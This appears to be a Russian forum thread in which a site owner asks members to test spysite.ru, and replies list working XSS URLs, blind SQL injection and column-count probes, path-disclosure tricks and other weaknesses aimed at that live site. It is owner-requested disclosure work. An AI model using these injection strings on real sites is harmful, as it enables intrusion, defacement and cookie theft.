Просьба огромная проверить на взлом www.spysite.ru Я сам писал коды, но возможно чтото упустил С Уважением.
1) http://www.spysite.ru/forum/admin.php без ограничения на кол-во попыток и картинки. 2) http://www.spysite.ru/forum/tools.php?event=find&find=ok' раскрытие пути.
xss http://www.spysite.ru/shop.php?shop=%C2%E8%E4%E5%EE%EA%E0%EC%E5%F0%FB%20Panasonic&sort=%F7%B8%F0%ED%EE-%E1%E5%EB%FB%E5%22%3E%3Cscript%3Ealert()%3C/script%3E&type=%E1%E5%E7%20%EE%E1%FA%E5%EA%F2%E8%E2%E0 это что за нах? http://spysite.ru/library.php в сорсах пишется структура базы ) HTML: <!-- SELECT * FROM library WHERE id=7 --> есть результат посерьезнее но пока постить не буду
продолжение.... [САЙТ] http://spysite.ru/contents/ http://spysite.ru/lib/ http://spysite.ru/setup/ http://spysite.ru/lib/review.php?article=1+and+(ascii(substring(VER SION(),1,1))=51) версия 3 юнион не работает а получать данные с таблицы особой охоты нет =) http://spysite.ru/lib/review.php?article=1+order+by+7/* полей 7 http://www.spysite.ru/news.php?new=i7+order+by+5/* полей 5 ну и множество раскрытия путей =) З.Ы. в низу страницы сбитые ссылки ну там "о нас" - ссылка на форум и тд.. [ФОРУМ] раскрытие путей http://spysite.ru/forum/tools.php?event=givmepassword http://spysite.ru/forum/tools.php?event=find&find=ok' З.Ы. запрети ты листинг директорий.. =)
to halkfild Спасибо. В понедельник буду править. Что касается кнопок внизу - знаю просто меняю дизайн. (но тож спасиб)
Что писать в .htacsess Ставлю .htacsess а сервак мне даже смотреть сайт не дает не только директории Не подскажет кто нить че там писать то надо, чтобы все ок было
извените что сюда пишу,просто почему то темы я создаю,а они не появляются,вот проверьте мою игру плизз,она на движке от ИВ.но переделанная. http://ladswar.com
Тот сайт,я нашёл дизайнера,пока что переделываем дизайн!!! Вот если можешь проверь этот проект,тоже мой,банер поставить не могу. но я записал ссылку и т.д в инфу к себе в игре,вот смотри статус АДМИНИСТРАТОР и там ссылки античата http://twog.lathost.lv/inf.php?2836 приходи поставлю тоже админа,если не веришь,
Spysite.Ru /library.php?article=--><script>alert(document.cookie)</script> /shop.php?shop=<br><h1><img%20src=http://anty611.jino-net.ru/antichat.ru.gif></h1><br"&sort=<br><h1>ANTICHAT.RU</h1><br"
[pasкрытие путей] http://spysite.ru/search.php?qwest[]= http://spysite.ru/news.php?new[]=i3 http://spysite.ru/lib/kernel.php http://spysite.ru/setup/forms.php тут интересно, но ничего нормального выдавить не сложилось.. там инициализируется переменная может инклюд /hsphere/local/home/spysite/spysite.ru/setup/forms.php з.ы. в 4,5 постах этой темы описаны рабочие уязвимости з.з.ы. зачем постить на проверку багов, если не исправлять то что найдено з.з.з.ы. старайтесь смотреть, не писал ли кто-то эти уязвимости
